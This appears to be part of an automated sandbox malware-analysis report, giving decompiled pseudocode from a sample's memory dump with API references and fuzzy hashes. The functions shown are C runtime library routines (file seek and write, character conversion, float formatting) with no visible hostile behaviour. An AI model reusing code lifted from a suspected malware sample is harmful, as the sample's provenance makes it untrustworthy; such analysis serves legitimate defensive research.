                                                                                                                                                                                                    											if(_t30 < 0) {
                                                                                                                                                                                                    												goto L39;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												goto L27;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t48 = _t48 - _t33;
                                                                                                                                                                                                    											L27:
                                                                                                                                                                                                    											__eflags = _t48;
                                                                                                                                                                                                    											if(_t48 == 0) {
                                                                                                                                                                                                    												L38:
                                                                                                                                                                                                    												return _t53[0x1a];
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												__eflags = _t53[0x12];
                                                                                                                                                                                                    												if(_t53[0x12] != 0) {
                                                                                                                                                                                                    													L30:
                                                                                                                                                                                                    													__eflags = _t53[0x1b] - 0xffffffff;
                                                                                                                                                                                                    													if(_t53[0x1b] != 0xffffffff) {
                                                                                                                                                                                                    														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                                                                                                                    														_t48 = _t48 - 1;
                                                                                                                                                                                                    														__eflags = _t53[0x1c];
                                                                                                                                                                                                    														_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                    														if(_t53[0x1c] != 0) {
                                                                                                                                                                                                    															_t53[0xe] = 1;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													__eflags = _t48;
                                                                                                                                                                                                    													if(_t48 <= 0) {
                                                                                                                                                                                                    														goto L38;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														while(1) {
                                                                                                                                                                                                    															_t35 = 0x4000;
                                                                                                                                                                                                    															__eflags = _t48 - 0x4000;
                                                                                                                                                                                                    															if(_t48 < 0x4000) {
                                                                                                                                                                                                    																_t35 = _t48;
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                                                                                                                                                    															_t55 = _t55 + 0xc;
                                                                                                                                                                                                    															__eflags = _t30;
                                                                                                                                                                                                    															if(_t30 <= 0) {
                                                                                                                                                                                                    																goto L39;
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    															_t48 = _t48 - _t30;
                                                                                                                                                                                                    															__eflags = _t48;
                                                                                                                                                                                                    															if(_t48 > 0) {
                                                                                                                                                                                                    																continue;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																goto L38;
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    															goto L41;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														goto L39;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                    													_t55 = _t55 + 4;
                                                                                                                                                                                                    													_t53[0x12] = _t30;
                                                                                                                                                                                                    													__eflags = _t30;
                                                                                                                                                                                                    													if(_t30 == 0) {
                                                                                                                                                                                                    														goto L39;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_push(0);
                                                                                                                                                                                                    										_push(_t48);
                                                                                                                                                                                                    										_push(_t53[0x10]);
                                                                                                                                                                                                    										_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                    										_t53[1] = 0;
                                                                                                                                                                                                    										 *_t53 = _t53[0x11];
                                                                                                                                                                                                    										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                                                                                                                    										__eflags = _t30;
                                                                                                                                                                                                    										if(_t30 < 0) {
                                                                                                                                                                                                    											goto L39;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t53[0x1a] = _t48;
                                                                                                                                                                                                    											_t53[0x19] = _t48;
                                                                                                                                                                                                    											return _t48;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								if(_t43 == 0) {
                                                                                                                                                                                                    									_t48 = _t48 - _t53[0x19];
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if(_t48 < 0) {
                                                                                                                                                                                                    									L39:
                                                                                                                                                                                                    									_t32 = _t30 | 0xffffffff;
                                                                                                                                                                                                    									__eflags = _t32;
                                                                                                                                                                                                    									return _t32;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(_t53[0x11] != 0) {
                                                                                                                                                                                                    										L11:
                                                                                                                                                                                                    										if(_t48 <= 0) {
                                                                                                                                                                                                    											L17:
                                                                                                                                                                                                    											return _t53[0x19];
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                    												_t39 = 0x4000;
                                                                                                                                                                                                    												if(_t48 < 0x4000) {
                                                                                                                                                                                                    													_t39 = _t48;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                                                                                                                                                    												_t55 = _t55 + 0xc;
                                                                                                                                                                                                    												if(_t30 == 0) {
                                                                                                                                                                                                    													goto L39;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t48 = _t48 - _t30;
                                                                                                                                                                                                    												if(_t48 > 0) {
                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													goto L17;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L41;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											goto L39;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                    										_t57 = _t55 + 4;
                                                                                                                                                                                                    										_t53[0x11] = _t30;
                                                                                                                                                                                                    										if(_t30 == 0) {
                                goto L39;
                            } else {
                                E0040BA30(_t48, _t30, 0, 0x4000);
                                _t55 = _t57 + 0xc;
                                goto L11;
                            }
                        }
                    }
                }
            }
        }
    }
    L41:
}
                                                                                                                                                                                                    0x00405d61
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405d67
                                                                                                                                                                                                    0x00405d6f
                                                                                                                                                                                                    0x00405d74
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405d74
                                                                                                                                                                                                    0x00405d61
                                                                                                                                                                                                    0x00405d4d
                                                                                                                                                                                                    0x00405d43
                                                                                                                                                                                                    0x00405d38
                                                                                                                                                                                                    0x00405d20
                                                                                                                                                                                                    0x00405d14
                                                                                                                                                                                                    0x00000000

APIs
Memory Dump Source
• Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID: _fseek_malloc_memset
• String ID:
• API String ID: 208892515-0
• Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
• Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
• Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
• Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
	signed int _v8;
	signed int _v12;
	signed int _v16;
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	signed int _t59;
	intOrPtr* _t61;
	signed int _t63;
	void* _t68;
	signed int _t69;
	signed int _t72;
	signed int _t74;
	signed int _t75;
	signed int _t77;
	signed int _t78;
	signed int _t81;
	signed int _t82;
	signed int _t84;
	signed int _t88;
	signed int _t97;
	signed int _t98;
	signed int _t99;
	intOrPtr* _t100;
	void* _t101;

	_t90 = __edx;
	if(_a8 == 0 || _a12 == 0) {
		L4:
		return 0;
	} else {
		_t100 = _a16;
		_t105 = _t100;
		if(_t100 != 0) {
			_t82 = _a4;
			__eflags = _t82;
			if(__eflags == 0) {
				goto L3;
			}
			_t63 = _t59 | 0xffffffff;
			_t90 = _t63 % _a8;
			__eflags = _a12 - _t63 / _a8;
			if(__eflags > 0) {
				goto L3;
			}
			_t97 = _a8 * _a12;
			__eflags =  *(_t100 + 0xc) & 0x0000010c;
			_v8 = _t82;
			_v16 = _t97;
			_t81 = _t97;
			if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
				_v12 = 0x1000;
			} else {
				_v12 =  *(_t100 + 0x18);
			}
			__eflags = _t97;
			if(_t97 == 0) {
				L32:
				return _a12;
			} else {
				do {
					_t84 =  *(_t100 + 0xc) & 0x00000108;
					__eflags = _t84;
					if(_t84 == 0) {
						L18:
						__eflags = _t81 - _v12;
						if(_t81 < _v12) {
							_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
							__eflags = _t68 - 0xffffffff;
							if(_t68 == 0xffffffff) {
								L34:
								_t69 = _t97;
								L35:
								return (_t69 - _t81) / _a8;
							}
							_v8 = _v8 + 1;
							_t72 =  *(_t100 + 0x18);
							_t81 = _t81 - 1;
							_v12 = _t72;
							__eflags = _t72;
							if(_t72 <= 0) {
								_v12 = 1;
							}
							goto L31;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							L21:
							__eflags = _v12;
							_t98 = _t81;
							if(_v12 != 0) {
								_t75 = _t81;
								_t90 = _t75 % _v12;
								_t98 = _t98 - _t75 % _v12;
								__eflags = _t98;
							}
							_push(_t98);
							_push(_v8);
							_push(E0040FA20(_t90, _t98, _t100));
							_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
							_t101 = _t101 + 0xc;
							__eflags = _t74 - 0xffffffff;
							if(_t74 == 0xffffffff) {
								L36:
								 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
								_t69 = _v16;
								goto L35;
							} else {
								_t88 = _t98;
                                                                                                                                                                                                    											__eflags = _t74 - _t98;
                                                                                                                                                                                                    											if(_t74 <= _t98) {
                                                                                                                                                                                                    												_t88 = _t74;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_v8 = _v8 + _t88;
                                                                                                                                                                                                    											_t81 = _t81 - _t88;
                                                                                                                                                                                                    											__eflags = _t74 - _t98;
                                                                                                                                                                                                    											if(_t74 < _t98) {
                                                                                                                                                                                                    												goto L36;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												L27:
                                                                                                                                                                                                    												_t97 = _v16;
                                                                                                                                                                                                    												goto L31;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t77 = E0040C1FB(_t100);
                                                                                                                                                                                                    									__eflags = _t77;
                                                                                                                                                                                                    									if(_t77 != 0) {
                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L21;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t78 =  *(_t100 + 4);
                                                                                                                                                                                                    								__eflags = _t78;
                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                    									goto L18;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                                                    									_t48 = _t100 + 0xc;
                                                                                                                                                                                                    									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                    									__eflags =  *_t48;
                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t99 = _t81;
                                                                                                                                                                                                    								__eflags = _t81 - _t78;
                                                                                                                                                                                                    								if(_t81 >= _t78) {
                                                                                                                                                                                                    									_t99 = _t78;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                                                                                                                                                    								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                                                                                                                                                    								 *_t100 =  *_t100 + _t99;
                                                                                                                                                                                                    								_t101 = _t101 + 0xc;
                                                                                                                                                                                                    								_t81 = _t81 - _t99;
                                                                                                                                                                                                    								_v8 = _v8 + _t99;
                                                                                                                                                                                                    								goto L27;
                                                                                                                                                                                                    								L31:
                                                                                                                                                                                                    								__eflags = _t81;
                                                                                                                                                                                                    							} while (_t81 != 0);
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t61 = E0040BFC1(_t105);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					 *_t61 = 0x16;
                                                                                                                                                                                                    					E0040E744(_t90, 0, _t100);
                                                                                                                                                                                                    					goto L4;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x0040bbad
                                                                                                                                                                                                    0x0040bbaf
                                                                                                                                                                                                    0x0040bbb1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bbb3
                                                                                                                                                                                                    0x0040bbb3
                                                                                                                                                                                                    0x0040bbb3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bbb3
                                                                                                                                                                                                    0x0040bbb1
                                                                                                                                                                                                    0x0040bba0
                                                                                                                                                                                                    0x0040bb6e
                                                                                                                                                                                                    0x0040bb74
                                                                                                                                                                                                    0x0040bb76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bb76
                                                                                                                                                                                                    0x0040bb35
                                                                                                                                                                                                    0x0040bb38
                                                                                                                                                                                                    0x0040bb3a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bb3c
                                                                                                                                                                                                    0x0040bbf1
                                                                                                                                                                                                    0x0040bbf1
                                                                                                                                                                                                    0x0040bbf1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bbf1
                                                                                                                                                                                                    0x0040bb42
                                                                                                                                                                                                    0x0040bb44
                                                                                                                                                                                                    0x0040bb46
                                                                                                                                                                                                    0x0040bb48
                                                                                                                                                                                                    0x0040bb48
                                                                                                                                                                                                    0x0040bb50
                                                                                                                                                                                                    0x0040bb55
                                                                                                                                                                                                    0x0040bb58
                                                                                                                                                                                                    0x0040bb5a
                                                                                                                                                                                                    0x0040bb5d
                                                                                                                                                                                                    0x0040bb5f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bbe1
                                                                                                                                                                                                    0x0040bbe1
                                                                                                                                                                                                    0x0040bbe1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bb2a
                                                                                                                                                                                                    0x0040bb24
                                                                                                                                                                                                    0x0040bac8
                                                                                                                                                                                                    0x0040bac8
                                                                                                                                                                                                    0x0040bacd
                                                                                                                                                                                                    0x0040bace
                                                                                                                                                                                                    0x0040bacf
                                                                                                                                                                                                    0x0040bad0
                                                                                                                                                                                                    0x0040bad1
                                                                                                                                                                                                    0x0040bad2
                                                                                                                                                                                                    0x0040bad8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040badd

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                                                    • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                                                    • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                                                    • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                                                      • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                      • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3240763771-0
                                                                                                                                                                                                    • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                    • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				char _t43;
                                                                                                                                                                                                    				char _t46;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                    				int _t57;
                                                                                                                                                                                                    				int _t58;
                                                                                                                                                                                                    				signed short* _t59;
                                                                                                                                                                                                    				short* _t60;
                                                                                                                                                                                                    				int _t65;
                                                                                                                                                                                                    				char* _t72;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t72 = _a8;
                                                                                                                                                                                                    				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if( *_t72 != 0) {
                                                                                                                                                                                                    						E0040EC86( &_v20, _a16);
                                                                                                                                                                                                    						_t43 = _v20;
                                                                                                                                                                                                    						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                                                    						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                                                    							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                                                                    							__eflags = _t46;
                                                                                                                                                                                                    							if(_t46 == 0) {
                                                                                                                                                                                                    								__eflags = _a4;
                                                                                                                                                                                                    								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									L10:
                                                                                                                                                                                                    									__eflags = _v8;
                                                                                                                                                                                                    									if(_v8 != 0) {
                                                                                                                                                                                                    										_t53 = _v12;
                                                                                                                                                                                                    										_t11 = _t53 + 0x70;
                                                                                                                                                                                                    										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                    										__eflags =  *_t11;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									return 1;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                    								_t54 = E0040BFC1(__eflags);
					 *_t54 = 0x2a;
					__eflags = _v8;
					if(_v8 != 0) {
						_t54 = _v12;
						_t33 = _t54 + 0x70;
						 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
						__eflags =  *_t33;
					}
					return _t54 | 0xffffffff;
				}
				_t56 = _v20;
				_t65 =  *(_t56 + 0xac);
				__eflags = _t65 - 1;
				if(_t65 <= 1) {
					L17:
					__eflags = _a12 -  *(_t56 + 0xac);
					if(__eflags < 0) {
						goto L21;
					}
					__eflags = _t72[1];
					if(__eflags == 0) {
						goto L21;
					}
					L19:
					_t57 =  *(_t56 + 0xac);
					__eflags = _v8;
					if(_v8 == 0) {
						return _t57;
					}
					 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
					return _t57;
				}
				__eflags = _a12 - _t65;
				if(_a12 < _t65) {
					goto L17;
				}
				__eflags = _a4;
				_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
				__eflags = _t58;
				_t56 = _v20;
				if(_t58 != 0) {
					goto L19;
				}
				goto L17;
			}
			_t59 = _a4;
			__eflags = _t59;
			if(_t59 != 0) {
				 *_t59 =  *_t72 & 0x000000ff;
			}
			goto L10;
		} else {
			_t60 = _a4;
			if(_t60 != 0) {
				 *_t60 = 0;
			}
			goto L5;
		}
	}
}

APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
• __isleadbyte_l.LIBCMT ref: 00415307
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
Memory Dump Source
• Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
• Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t25 = _a16;
                                                                                                                                                                                                    				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                                                                    					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t34 = _t25 - 0x66;
                                                                                                                                                                                                    					if(_t25 != 0x66) {
                                                                                                                                                                                                    						__eflags = _t25 - 0x61;
                                                                                                                                                                                                    						if(_t25 == 0x61) {
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							__eflags = _t25 - 0x41;
                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                    								goto L7;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						return _t26;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}






                                                                                                                                                                                                    0x004134e0
                                                                                                                                                                                                    0x004134e6
                                                                                                                                                                                                    0x00413559
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004134ed
                                                                                                                                                                                                    0x004134ed
                                                                                                                                                                                                    0x004134f0
                                                                                                                                                                                                    0x0041350b
                                                                                                                                                                                                    0x0041350e
                                                                                                                                                                                                    0x0041352e
                                                                                                                                                                                                    0x00413540
                                                                                                                                                                                                    0x00413510
                                                                                                                                                                                                    0x00413510
                                                                                                                                                                                                    0x00413513
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00413515
                                                                                                                                                                                                    0x00413527
                                                                                                                                                                                                    0x00413527
                                                                                                                                                                                                    0x00413513
                                                                                                                                                                                                    0x0041355e
                                                                                                                                                                                                    0x00413562
                                                                                                                                                                                                    0x004134f2
                                                                                                                                                                                                    0x0041350a
                                                                                                                                                                                                    0x0041350a
                                                                                                                                                                                                    0x004134f0

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                    • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%